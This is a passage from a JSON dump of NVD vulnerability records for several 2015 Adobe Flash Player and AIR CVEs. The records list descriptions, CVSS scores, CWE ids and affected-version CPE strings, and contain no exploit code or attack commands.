"AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3078, CVE-2015-3089, and CVE-2015-3090.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3093", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3093"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3093", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3093", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Heap-based buffer overflow in Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allows attackers to execute arbitrary code via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3088", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3088"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3088", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3078, CVE-2015-3089, and CVE-2015-3093.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3090", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3090"], "modified": "2017-01-03T03:00:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3090", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Integer overflow in Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allows attackers to execute arbitrary code via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3087", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3087"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3087", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3087", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3083 and CVE-2015-3085.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3082", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3082"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3082", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3082", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2015-3077 and CVE-2015-3084.\n<a href=\"http://cwe.mitre.org/data/definitions/843.html\">CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')</a>", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3086", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3086"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3086", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3082 and CVE-2015-3083.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3085", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3085"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3085", "cvss": {"score": 6.4, "vector": 